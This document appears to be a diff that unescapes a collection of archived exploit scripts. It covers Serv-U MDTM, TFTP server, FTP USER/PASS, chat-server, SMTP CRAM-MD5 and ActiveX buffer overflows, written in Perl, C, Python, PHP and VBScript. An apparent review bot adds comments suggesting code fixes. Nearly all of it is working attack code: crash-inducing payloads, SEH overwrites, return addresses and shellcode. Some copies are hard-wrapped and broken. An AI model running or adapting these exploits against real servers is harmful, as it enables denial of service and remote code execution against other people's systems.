exploit = rand_text_alphanumeric(1024, payload_badchars)
|
||||
exploit += [target[\'Ret\']].pack(\'V\') + payload.encoded
|
||||
exploit += [target['Ret']].pack('V') + payload.encoded
|
||||
|
||||
sock.put(exploit + \"\\r\\n\\r\\n\")
|
||||
sock.put(exploit + "\r\n\r\n")
|
||||
|
||||
disconnect
|
||||
handler
|
||||
|
|
|
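Review bot: the local variable `exploit` inside the `exploit` method shadows the method name, which is legal Ruby but confusing when reading `exploit += [target['Ret']].pack('V') + payload.encoded`; rename it to `buf` or similar. The `pack('V')` of `target['Ret']` and the trailing `"\r\n\r\n"` are unaffected by the unescaping.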
@ -11,25 +11,25 @@ The problem exists due to insufficient bounds checking. Ultimately an attacker m
|
|||
## I do not take responsibility for the use of this code
|
||||
|
||||
use IO::Socket qw(:DEFAULT :crlf);
|
||||
print \"Serv-u MDTM Buffer overflow - by saintjmf\\n\";
|
||||
print "Serv-u MDTM Buffer overflow - by saintjmf\n";
|
||||
|
||||
## Get Host port unsername and password
|
||||
|
||||
my $host = shift || die print \"\\nUsage: <program> <Host> <port> <username> <password>\\n\";
|
||||
my $port = shift || die print \"\\nUsage: <program> <Host> <port> <username> <password> \\n\";
|
||||
my $host = shift || die print "\nUsage: <program> <Host> <port> <username> <password>\n";
|
||||
my $port = shift || die print "\nUsage: <program> <Host> <port> <username> <password> \n";
|
||||
|
||||
$username = shift || die print \"\\nUsage: <program> <Host> <port> <username> <password> \\n\";
|
||||
$password = shift || die print \"\\nUsage: <program> <Host> <port> <username> <password> \\n\";
|
||||
$username = shift || die print "\nUsage: <program> <Host> <port> <username> <password> \n";
|
||||
$password = shift || die print "\nUsage: <program> <Host> <port> <username> <password> \n";
|
||||
|
||||
## Create Socket
|
||||
my $socket = IO::Socket::INET->new(\"$host:$port\") or die print \"\\nUnable to connect -- $!\\n\";
|
||||
my $socket = IO::Socket::INET->new("$host:$port") or die print "\nUnable to connect -- $!\n";
|
||||
|
||||
print \"connecting...............\\n\\n\";
|
||||
print "connecting...............\n\n";
|
||||
|
||||
connecter($socket);
|
||||
|
||||
|
||||
print \"Server should be stopped\\n\";
|
||||
print "Server should be stopped\n";
|
||||
|
||||
|
||||
## Sub that sends username, password and exploit
|
||||
|
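Review bot: `die print "\nUsage: ..."` is wrong: `print` runs first and returns 1, so `die` is called with the message `1` and the script ends with `1 at ... line N` after the usage text; write `die "\nUsage: ...\n"` (or `print ...; exit 1`). The same pattern is repeated on all four argument lines and on the socket creation line. `$username` and `$password` are also assigned without `my`, unlike `$host` and `$port`; add `use strict; use warnings;` and declare them.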
@ -39,20 +39,20 @@ sub connecter{
my $socket2 = shift;
my $message2 = <$socket2>;
chomp $message2;
print \"$message2\\n\";
print "$message2\n";
sleep(5);
print $socket2 \"user $username\",CRLF;
print $socket2 "user $username",CRLF;
$message2 = <$socket2>;
chomp $message2;
print \"$message2\\n\";
print "$message2\n";
sleep (5);
print $socket2 \"pass $password\", CRLF;
print $socket2 "pass $password", CRLF;

$message2 = <$socket2>;
chomp $message2;
print \"$message2\\n\";
print "$message2\n";
sleep (4);
print \"Sending MDTM Overflow.....\\n\";
print $socket2 \"MDTM 20041111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /test.txt\" ,CRLF;
print "Sending MDTM Overflow.....\n";
print $socket2 "MDTM 20041111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /test.txt" ,CRLF;

}
@ -4,7 +4,7 @@ Serv-U FTP Server has been reported prone to a remote stack based buffer overflo

The problem exists due to insufficient bounds checking. Ultimately an attacker may leverage this issue to have arbitrary instructions executed in the context of the SYSTEM user.

/* serv-u-mdtm-expl.c - Serv-U \"MDTM\" buffer overflow PoC DoS exploit.
/* serv-u-mdtm-expl.c - Serv-U "MDTM" buffer overflow PoC DoS exploit.
*
* This program will send an overly large filename parameter when calling
* the Serv-U FTP MDTM command. Although arbitrary code execution is
@ -34,9 +34,9 @@ The problem exists due to insufficient bounds checking. Ultimately an attacker m

int main(int argc, char *argv[]) {
if(argc < 5) {
printf(\"Serv-U \'MDTM\' buffer overflow DoS exploit.\\n\");
printf(\"by shaun2k2 - <shaunige@yahoo.co.uk>.\\n\\n\");
printf(\"Usage: %s <host> <port> <login> <password>\\n\", argv[0]);
printf("Serv-U 'MDTM' buffer overflow DoS exploit.\n");
printf("by shaun2k2 - <shaunige@yahoo.co.uk>.\n\n");
printf("Usage: %s <host> <port> <login> <password>\n", argv[0]);
exit(-1);
}

@ -50,13 +50,13 @@ int main(int argc, char *argv[]) {

/* lookup IP address of supplied hostname. */
if((he = gethostbyname(argv[1])) == NULL) {
printf(\"Couldn\'t resolve %s!\\n\", argv[1]);
printf("Couldn't resolve %s!\n", argv[1]);
exit(-1);
}

/* create socket. */
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror(\"socket()\");
perror("socket()");
exit(-1);
}

@ -65,26 +65,26 @@ int main(int argc, char *argv[]) {
dest.sin_port = htons(atoi(argv[2]));
dest.sin_addr = *((struct in_addr *)he->h_addr);

printf(\"Serv-U \'MDTM\' buffer overflow DoS exploit.\\n\");
printf(\"by shaun2k2 - <shaunige@yahoo.co.uk>.\\n\\n\");
printf("Serv-U 'MDTM' buffer overflow DoS exploit.\n");
printf("by shaun2k2 - <shaunige@yahoo.co.uk>.\n\n");

printf(\"Crafting exploit buffer...\\n\\n\");
printf("Crafting exploit buffer...\n\n");
/* craft exploit buffers. */
memset(bigbuf, \'a\', 6000);
sprintf(loginbuf, \"USER %s\\n\", argv[3]);
sprintf(passwdbuf, \"PASS %s\\n\", argv[4]);
sprintf(explbuf, \"MDTM 20031111111111+%s\\r\\n\", bigbuf);
memset(bigbuf, 'a', 6000);
sprintf(loginbuf, "USER %s\n", argv[3]);
sprintf(passwdbuf, "PASS %s\n", argv[4]);
sprintf(explbuf, "MDTM 20031111111111+%s\r\n", bigbuf);


printf(\"[+] Connecting...\\n\");
printf("[+] Connecting...\n");
if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) < 0) {
perror(\"connect()\");
perror("connect()");
exit(-1);
}

printf(\"[+] Connected!\\n\\n\");
printf("[+] Connected!\n\n");

printf(\"[+] Sending exploit buffers...\\n\");
printf("[+] Sending exploit buffers...\n");
sleep(1); /* give the serv-u server time to sort itself out. */
send(sock, loginbuf, strlen(loginbuf), 0);
sleep(2); /* wait for 2 secs. */
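Review bot: `memset(bigbuf, 'a', 6000)` writes no terminating NUL, yet `bigbuf` is then consumed by `%s` in `sprintf(explbuf, "MDTM 20031111111111+%s\r\n", bigbuf)`; whether that read stops at 6000 bytes depends on how `bigbuf` is declared, which is outside this hunk and should be confirmed (a read past the array is a bug in the PoC itself). Style: the three commands built here use different line terminators, `"USER %s\n"` and `"PASS %s\n"` end in a bare LF while the MDTM line ends in `\r\n`; FTP (RFC 959) specifies CRLF, so the three should agree.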
@ -92,11 +92,11 @@ int main(int argc, char *argv[]) {
sleep(2); /* wait before sending large MDTM command. */
send(sock, explbuf, strlen(explbuf), 0);
sleep(1); /* wait before closing the socket. */
printf(\"[+] Exploit buffer sent!\\n\\n\");
printf("[+] Exploit buffer sent!\n\n");

close(sock);

printf(\"[+] Done! Check if the Serv-U server has crashed.\\n\");
printf("[+] Done! Check if the Serv-U server has crashed.\n");

return(0);
}
@ -4,7 +4,7 @@ Serv-U FTP Server has been reported prone to a remote stack based buffer overflo

The problem exists due to insufficient bounds checking. Ultimately an attacker may leverage this issue to have arbitrary instructions executed in the context of the SYSTEM user.

/* serv-u-mdtm-expl.c - Serv-U \"MDTM\" buffer overflow
/* serv-u-mdtm-expl.c - Serv-U "MDTM" buffer overflow
PoC DoS exploit.
*
* This program will send an overly large filename
@ -45,12 +45,12 @@ login and password.

int main(int argc, char *argv[]) {
if(argc < 5) {
printf(\"Serv-U \'MDTM\' buffer overflow
DoS exploit.\\n\");
printf(\"by shaun2k2 -
<shaunige@yahoo.co.uk>.\\n\\n\");
printf(\"Usage: %s <host> <port>
<login> <password>\\n\", argv[0]);
printf("Serv-U 'MDTM' buffer overflow
DoS exploit.\n");
printf("by shaun2k2 -
<shaunige@yahoo.co.uk>.\n\n");
printf("Usage: %s <host> <port>
<login> <password>\n", argv[0]);
exit(-1);
}

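Review bot: this second copy of serv-u-mdtm-expl.c is hard-wrapped: `printf("Serv-U 'MDTM' buffer overflow` continues on the next line as `DoS exploit.\n");` with no string continuation, and the same happens to the `by shaun2k2 -` and `Usage:` lines, so the file cannot compile as stored. The unescaping is correct, but since the preceding hunks carry the same source unwrapped, this looks like a wrapped duplicate that should be dropped or re-joined rather than only unescaped.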
@ -63,7 +63,7 @@ DoS exploit.\\n\");

/* lookup IP address of supplied hostname. */
if((he = gethostbyname(argv[1])) == NULL) {
printf(\"Couldn\'t resolve %s!\\n\",
printf("Couldn't resolve %s!\n",
argv[1]);
exit(-1);
}
@ -71,7 +71,7 @@ argv[1]);
/* create socket. */
if((sock = socket(AF_INET, SOCK_STREAM, 0)) <
0) {
perror(\"socket()\");
perror("socket()");
exit(-1);
}

@ -81,29 +81,29 @@ argv[1]);
dest.sin_addr = *((struct in_addr
*)he->h_addr);

printf(\"Serv-U \'MDTM\' buffer overflow DoS
exploit.\\n\");
printf(\"by shaun2k2 -
<shaunige@yahoo.co.uk>.\\n\\n\");
printf("Serv-U 'MDTM' buffer overflow DoS
exploit.\n");
printf("by shaun2k2 -
<shaunige@yahoo.co.uk>.\n\n");

printf(\"Crafting exploit buffer...\\n\\n\");
printf("Crafting exploit buffer...\n\n");
/* craft exploit buffers. */
sprintf(loginbuf, \"USER %s\\n\", argv[3]);
sprintf(passwdbuf, \"PASS %s\\n\", argv[4]);
explbuf = \"MDTM
20031111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/test.txt\";
sprintf(loginbuf, "USER %s\n", argv[3]);
sprintf(passwdbuf, "PASS %s\n", argv[4]);
explbuf = "MDTM
20031111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/test.txt";


printf(\"[+] Connecting...\\n\");
printf("[+] Connecting...\n");
if(connect(sock, (struct sockaddr *)&dest,
sizeof(struct sockaddr)) < 0) {
perror(\"connect()\");
perror("connect()");
exit(-1);
}

printf(\"[+] Connected!\\n\\n\");
printf("[+] Connected!\n\n");

printf(\"[+] Sending exploit buffers...\\n\");
printf("[+] Sending exploit buffers...\n");
sleep(1); /* give the serv-u server time to
sort itself out. */
send(sock, loginbuf, strlen(loginbuf), 0);
@ -114,12 +114,12 @@ command. */
send(sock, explbuf, strlen(explbuf), 0);
sleep(1); /* wait before closing the socket.
*/
printf(\"[+] Exploit buffer sent!\\n\\n\");
printf("[+] Exploit buffer sent!\n\n");

close(sock);

printf(\"[+] Done! Check if the Serv-U server
has crashed.\\n\");
printf("[+] Done! Check if the Serv-U server
has crashed.\n");

return(0);
}
@ -17,31 +17,31 @@
#!/usr/bin/python
import socket
import sys
host = \\\'192.168.1.32\\\'
host = '192.168.1.32'
port = 69

nseh=\\\"\\\\xCC\\\\xCC\\\\xCC\\\\xCC\\\"
nseh="\xCC\xCC\xCC\xCC"

#seh handler overwritten at 261 byte of shellcode but to exception triggered to use it.

seh=\\\"\\\\x18\\\\x0B\\\\x27\\\" # Breakpoint in no SafeSEH space in Windows XP SP3
seh="\x18\x0B\x27" # Breakpoint in no SafeSEH space in Windows XP SP3


payload=\\\"\\\\xCC\\\"*257 + nseh + seh + \\\"\\\\x00\\\" + \\\"3137\\\" + \\\"\\\\x00\\\"
payload="\xCC"*257 + nseh + seh + "\x00" + "3137" + "\x00"

#payload to get access violation:
#payload=(\\\"\\\\x00\\\\x01\\\\x25\\\\x32\\\\x35\\\\x25\\\"
#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\"
#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\"
#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\"
#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\"
#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\"
#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\"
#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x35\\\"
#\\\"\\\\x63\\\\x65\\\\x74\\\\x63\\\\x25\\\\x32\\\\x35\\\\x35\\\\x63\\\\x68\\\\x6f\\\\x73\\\\x74\\\\x73\\\\x00\\\\x6e\\\"
#\\\"\\\\x00\\\")
#payload=("\x00\x01\x25\x32\x35\x25"
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x35"
#"\x63\x65\x74\x63\x25\x32\x35\x35\x63\x68\x6f\x73\x74\x73\x00\x6e"
#"\x00")

buffer=\\\"\\\\x00\\\\x01\\\"+ payload + \\\"\\\\x06\\\" + \\\"netascii\\\" + \\\"\\\\x00\\\"
buffer="\x00\x01"+ payload + "\x06" + "netascii" + "\x00"


s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
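Review bot: the old lines in this file carry three escaping layers (`host = \\\'192.168.1.32\\\'`, `nseh=\\\"\\\\xCC...`) whereas the Perl file at the top of the diff carried one, yet the replacement lines are plain source in both cases (`host = '192.168.1.32'`, `nseh="\xCC\xCC\xCC\xCC"`). That is the right target, but it means the conversion was not a single uniform substitution, so a spot check that files containing a genuine doubled backslash were not collapsed one layer too far would be worthwhile. Minor: the comment `but to exception triggered` presumably means `but no exception triggered`.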
@ -14,12 +14,12 @@ from socket import *
import sys
import select

pwn = \"\\x00\\x02\"
pwn += \"\\x66\\x69\\x6c\\x65\\x2e\\x74\\x78\\x74\\x00\"
pwn += \"A\"*1200
pwn += \"\\x00\"
pwn = "\x00\x02"
pwn += "\x66\x69\x6c\x65\x2e\x74\x78\x74\x00"
pwn += "A"*1200
pwn += "\x00"

address = (\'192.168.200.20\', 69)
address = ('192.168.200.20', 69)
server_socket = socket(AF_INET, SOCK_DGRAM)

server_socket.sendto(pwn, address)
@ -17,7 +17,7 @@
# A vulnerability has been identified in 3CTftpSvc TFTP Server, which could be exploited by attackers
# to execute arbitrary commands or cause a denial of service. This flaw is
# due to a buffer overflow error when handling an overly long transporting
# mode (more than 470 bytes) passed to a \"GET\" or \"PUT\" command, which could
# mode (more than 470 bytes) passed to a "GET" or "PUT" command, which could
# be exploited by malicious users to compromise a vulnerable system or crash
# an affected application.

@ -26,18 +26,18 @@
import socket
import sys

host = \'192.168.1.11\'
host = '192.168.1.11'
port = 69

try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print \"socket() failed\"
print "socket() failed"
sys.exit(1)

filename = \"A\"
mode = \"netascii\" + \"A\" * 469
da = \"\\x00\\x02\" + filename + \"\\0\" + mode + \"\\0\"
filename = "A"
mode = "netascii" + "A" * 469
da = "\x00\x02" + filename + "\0" + mode + "\0"
s.sendto(da, (host, port))

# milw0rm.com [2006-11-27]
@ -2,7 +2,7 @@ source: http://www.securityfocus.com/bid/21612/info

Multiple applications are prone to a denial-of-service vulnerability.

A remote attacker may exploit this vulnerability by presenting malicious \'WMV\', \'MID\', and \'AVI\' files to a victim user. When an affected application processes this image, the application crashes, effectively denying service.
A remote attacker may exploit this vulnerability by presenting malicious 'WMV', 'MID', and 'AVI' files to a victim user. When an affected application processes this image, the application crashes, effectively denying service.

It is not known at this time if this issue can be leveraged to execute arbitrary code; this BID will be updated as further information becomes available.

@ -14,20 +14,20 @@ An attacker can exploit these issues to execute arbitrary code within the contex

use Socket;

$retPtr = \"\\x60\\xef\\xff\\xbf\";
$retPtr = "\x60\xef\xff\xbf";

# Pirated from some guy called gunslinger_
$exit1code = \"\\x31\\xc0\\xb0\\x01\\x31\\xdb\\xcd\\x80\";
$exit1code = "\x31\xc0\xb0\x01\x31\xdb\xcd\x80";

$code = \"\\x90\" x 120 . $exit1code . $retPtr;
$code = "\x90" x 120 . $exit1code . $retPtr;

socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\"tcp\")) or die \"Couldn\'t open socket\";
bind(SOCKET, sockaddr_in(6667, inet_aton(\"127.0.0.1\"))) or die \"Couldn\'t bind to port 6667\";
listen(SOCKET,5) or die \"Couldn\'t listen on port\";
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "Couldn't open socket";
bind(SOCKET, sockaddr_in(6667, inet_aton("127.0.0.1"))) or die "Couldn't bind to port 6667";
listen(SOCKET,5) or die "Couldn't listen on port";

while(accept(CLIENT,SOCKET)){
sleep 1;
select((select(CLIENT), $|=1)[0]);
print CLIENT \":-psyBNC!~cjd\\@ef.net PRIVMSG luser : :($code\\r\\n\";
print CLIENT ":-psyBNC!~cjd\@ef.net PRIVMSG luser : :($code\r\n";
}
close(SOCKET);
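Review bot: the `\@` in `print CLIENT ":-psyBNC!~cjd\@ef.net ..."` has to keep its backslash inside a Perl double-quoted string, otherwise `@ef` is interpolated as an array; the new line preserves it (`\\@` to `\@`), which confirms that exactly one escaping layer was removed in this file. Style: `select((select(CLIENT), $|=1)[0]);` is the classic autoflush idiom, and `CLIENT->autoflush(1)` from IO::Handle says the same thing more readably.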
@ -11,10 +11,10 @@
*Coded by Marsu <Marsupilamipowa@hotmail.fr> *
************************************************************************/

#include \"winsock2.h\"
#include \"stdio.h\"
#include \"stdlib.h\"
#pragma comment(lib, \"ws2_32.lib\")
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")

int main(int argc, char* argv[])
{
@ -28,58 +28,58 @@ int main(int argc, char* argv[])

if (argc!=3)
{
printf(\"[+] Usage: %s <ip> <port>\\n\",argv[0]);
printf("[+] Usage: %s <ip> <port>\n",argv[0]);
return 1;
}
WSACleanup();
WSAStartup(MAKEWORD(2,0),&wsa);

printf(\"[+] Connecting to %s:%s ... \",argv[1],argv[2]);
printf("[+] Connecting to %s:%s ... ",argv[1],argv[2]);
if ((he=gethostbyname(argv[1])) == NULL) {
printf(\"Failed\\n[-] Could not init gethostbyname\\n\");
printf("Failed\n[-] Could not init gethostbyname\n");
return 1;
}
if ((ftpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
printf(\"Failed\\n[-] Socket error\\n\");
printf("Failed\n[-] Socket error\n");
return 1;
}

sock_addr.sin_family = PF_INET;
sock_addr.sin_port = htons(atoi(argv[2]));
sock_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(sock_addr.sin_zero), \'\\0\', 8);
memset(&(sock_addr.sin_zero), '\0', 8);
if (connect(ftpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
printf(\"Failed\\n[-] Sorry, cannot connect to %s:%s. Error: %i\\n\", argv[1],argv[2],WSAGetLastError());
printf("Failed\n[-] Sorry, cannot connect to %s:%s. Error: %i\n", argv[1],argv[2],WSAGetLastError());
return 1;
}
printf(\"OK\\n\");
memset(recvbuff,\'\\0\',1024);
printf("OK\n");
memset(recvbuff,'\0',1024);
recv(ftpsock, recvbuff, 1024, 0);

printf(\"[+] Building payload ... \");
memset(evilbuff,\'A\',buflen);
memset(evilbuff+585,\'B\',4); //eax and edx will be 42424262
memcpy(evilbuff,\"USER \",5);
memcpy(evilbuff+buflen,\"\\r\\n\\0\",3);
printf(\"OK\\n[+] Sending USER ... \");
printf("[+] Building payload ... ");
memset(evilbuff,'A',buflen);
memset(evilbuff+585,'B',4); //eax and edx will be 42424262
memcpy(evilbuff,"USER ",5);
memcpy(evilbuff+buflen,"\r\n\0",3);
printf("OK\n[+] Sending USER ... ");
if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
printf(\"Failed\\n[-] Could not send\\n\");
printf("Failed\n[-] Could not send\n");
return 1;
}
printf(\"OK\\n\");
memset(recvbuff,\'\\0\',1024);
printf("OK\n");
memset(recvbuff,'\0',1024);
recv(ftpsock, recvbuff, 1024, 0);

memcpy(evilbuff,\"PASS \",5);
printf(\"[+] Sending PASS ... \");
memcpy(evilbuff,"PASS ",5);
printf("[+] Sending PASS ... ");
if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
printf(\"Failed\\n[-] Could not send\\n\");
printf("Failed\n[-] Could not send\n");
return 1;
}
printf(\"OK\\n\");
printf("OK\n");
recv(ftpsock, recvbuff, 1024, 0);

printf(\"[+] Host should be down\\n\");
printf("[+] Host should be down\n");
return 0;
}

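Review bot: `WSACleanup();` is called before `WSAStartup(MAKEWORD(2,0),&wsa);`, where it is a no-op that fails with WSANOTINITIALISED, and the return value of `WSAStartup` is never checked; drop the early cleanup (or move it before the final `return 0;`) and test the startup result before creating the socket. The three `recv(ftpsock, recvbuff, 1024, 0);` calls also discard their return value, so a closed connection is indistinguishable from a reply, and `memset(recvbuff,'\0',1024)` followed by a full 1024-byte `recv` leaves no room for a terminator if the buffer is exactly 1024 bytes (its declaration is outside this hunk).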
@ -20,16 +20,16 @@
use IO::Socket;
use strict;

my($socket) = \"\";
my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => \"69\",
PeerPort => "69",

Proto => \"UDP\"))
Proto => "UDP"))
{

print $socket \"A\" x 517;
print $socket "A" x 517;
sleep(1);


@ -37,7 +37,7 @@ Proto => \"UDP\"))
}
else
{
print \"Cannot connect to $ARGV[0]:69\\n\";
print "Cannot connect to $ARGV[0]:69\n";
}

# milw0rm.com [2007-03-08]
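Review bot: the `else` branch's message `Cannot connect to $ARGV[0]:69` overstates what was checked: with `Proto => "UDP"` in the previous hunk, `IO::Socket::INET->new` succeeds as soon as the local socket can be created and the peer name resolves, so this branch is only reached on local failures, never because nothing is listening on port 69. Something like "Cannot create UDP socket for $ARGV[0]:69: $!" would describe the condition accurately.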
@ -1,7 +1,7 @@
<span style=\"font: 14pt Courier New;\"><p align=\"center\"><b>2007/05/07</b></p></span>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/07</b></p></span>
<pre>
<code><span style=\"font: 10pt Courier New;\"><span class=\"general1-symbol\">-------------------------------------------------------------------------------------
<b>Versalsoft HTTP File Uploader (UFileUploaderD.dll) \'AddFile\' method Buffer Overflow</b>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------------------------------
<b>Versalsoft HTTP File Uploader (UFileUploaderD.dll) 'AddFile' method Buffer Overflow</b>
url: http://en.versalsoft.com/
price: from $59.95 to $799.95

@ -13,25 +13,25 @@
Try only 1500 characters (or less) to see IE crash.
-------------------------------------------------------------------------------------

<object classid=\'clsid:28776DAD-5914-42A7-9139-8FD7C756BBDD\' id=\'target\' style=\"width: 650px; height: 250px\"></object>
<object classid='clsid:28776DAD-5914-42A7-9139-8FD7C756BBDD' id='target' style="width: 650px; height: 250px"></object>

<input language=VBScript onclick=tryMe() type=button value=\"Click here to start the test\"> <input language=VBScript onclick=QuoteMe() type=button value=\"Quoting...\">
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <input language=VBScript onclick=QuoteMe() type=button value="Quoting...">

<script language=\'vbscript\'>
<script language='vbscript'>
Sub tryMe
on error resume next
arg1 = String (4000,\"A\")
arg1 = String (4000,"A")
target.AddFile arg1
End Sub

Sub QuoteMe
Dim MyMsg
MyMsg = MsgBox(\"I\'m coming down with a fever\" & vbCrLf & _
\"I\'m really out to sea\" & vbCrLf & _
\"This kettle is boiling over\" & vbCrLf & _
\"I think I\'m a banana tree\", 64, \"2007/05/07 - Versalsoft HTTP File Uploader\")
MyMsg = MsgBox("I'm coming down with a fever" & vbCrLf & _
"I'm really out to sea" & vbCrLf & _
"This kettle is boiling over" & vbCrLf & _
"I think I'm a banana tree", 64, "2007/05/07 - Versalsoft HTTP File Uploader")
End Sub
</script><b><font color=\"#FF0000\">As you can see by the faultmon dump, EIP is overwrite so code execution should
</script><b><font color="#FF0000">As you can see by the faultmon dump, EIP is overwrite so code execution should
be possible... but I leave to posterity the hardest part of work :)</font color></b>

11:40:51.172 pid=08E4 tid=0AB0 EXCEPTION (first-chance)
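Review bot: `</font color></b>` on the unchanged closing line is not a valid end tag (`</font>` is), so the red text will not be closed where the author intended; the unescaping of the `<object>`, `<input>` and VBScript lines above it is correct, and since this is an archival pass the malformed tag can stay, but it is worth noting if the file is ever rendered rather than read.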
@ -24,18 +24,18 @@ length for Name & Password. If attacker inserts a long Name &
Password by editing or make his own login page, chat server
will crash.
*/
echo \"Easy Chat Server Remote DoS Exploit\\n\\t\\t\\t\\tby NetJackal\";
if($argc<2)die(\"\\nUsage: php dos.php [TARGET] [PORT]\\nExample: php dos.php localhost 80\\n\");
echo "Easy Chat Server Remote DoS Exploit\n\t\t\t\tby NetJackal";
if($argc<2)die("\nUsage: php dos.php [TARGET] [PORT]\nExample: php dos.php localhost 80\n");
$host=$argv[1];
$port=$argv[2];
$A=str_repeat(\'A\',999);
echo \"\\nConnecting...\";
$A=str_repeat('A',999);
echo "\nConnecting...";
$link=fsockopen($host,$port,$en,$es,30);
if(!$link)die(\"\\n$en: $es\");
echo \"\\nConnected!\";
echo \"\\nSending exploit...\";
fputs($link,\"GET /chat.ghp?username=$A&password=$A&room=1&sex=2 HTTP/1.1\\r\\nHost: $host\\r\\n\\r\\n\");
echo \"\\nWell done!\\n\";
if(!$link)die("\n$en: $es");
echo "\nConnected!";
echo "\nSending exploit...";
fputs($link,"GET /chat.ghp?username=$A&password=$A&room=1&sex=2 HTTP/1.1\r\nHost: $host\r\n\r\n");
echo "\nWell done!\n";
?>

# milw0rm.com [2007-08-14]
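Review bot: `if($argc<2)die(...)` guards only the target argument, but `$port=$argv[2];` is read unconditionally, so `php dos.php localhost` passes the check and reaches `fsockopen($host,$port,$en,$es,30)` with an undefined port; the condition should be `$argc<3` to match the usage text `[TARGET] [PORT]`.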
@ -14,14 +14,14 @@
use IO::Socket;
use MIME::Base64;
$|=1;
$host = \"localhost\";
$a = \"QUFB\" x 10000;
my $sock = IO::Socket::INET->new(PeerAddr => \"$host\",
PeerPort => \'25\',
Proto => \'tcp\');
print $sock \"EHLO you\\r\\n\";
print $sock \"AUTH CRAM-MD5\\r\\n\";
print $sock $a . \"\\r\\n\";
$host = "localhost";
$a = "QUFB" x 10000;
my $sock = IO::Socket::INET->new(PeerAddr => "$host",
PeerPort => '25',
Proto => 'tcp');
print $sock "EHLO you\r\n";
print $sock "AUTH CRAM-MD5\r\n";
print $sock $a . "\r\n";
while(<$sock>) {
print;
}
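Review bot: `$a = "QUFB" x 10000;` uses `$a`, which Perl reserves together with `$b` for `sort` comparison blocks and exempts from `use strict`; a descriptive name avoids surprises if the script ever gains a `sort`. `use MIME::Base64;` is also imported but never called, since the base64 text is written out literally.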
@ -28,9 +28,9 @@ Tested agains: Itunes 8.0.2.20/Quicktime 7.5.5 on XP SP3 fully patched

================

\"Many of today\'s leading authoring, multimedia and entertainment applications rely on QuickTime to do the heavy lifting.
"Many of today's leading authoring, multimedia and entertainment applications rely on QuickTime to do the heavy lifting.
QuickTime contains a rich set of developer APIs for handling almost any audio, video and media task.
Easily make your application multimedia-enabled with QuickTime.\"
Easily make your application multimedia-enabled with QuickTime."

=======

@ -41,13 +41,13 @@ Quicktime & itunes fails to handle long arguments on a .mov file.
Quicktime is compiled with the /GS cookie on , so the bug get handled with an exit code :
c0000409
but ...
Itunes doesn\'t seems to be compiled with the /GS flag, so we get some code execution possible via Itunes.
The PoC give\'s us full control over EAX & EDI
Itunes doesn't seems to be compiled with the /GS flag, so we get some code execution possible via Itunes.
The PoC give's us full control over EAX & EDI
Itunes call unsafely the Quicktime function to play the .mov, so we can trigger a possible code execution
via this unsafe call to quicktime héhéhé :)
The only problem, is the lengh of the buffer overflowed :(
erf ... 49 bytes, less the 8 bytes controlling the EDI & EAX registers so 41.
i\'ve tryed to find a way to fill some buffer in the .mov to get some code exec working on this poc,
i've tryed to find a way to fill some buffer in the .mov to get some code exec working on this poc,
but out of luck, i guess someone will maybe be able to do some magic tricks :)


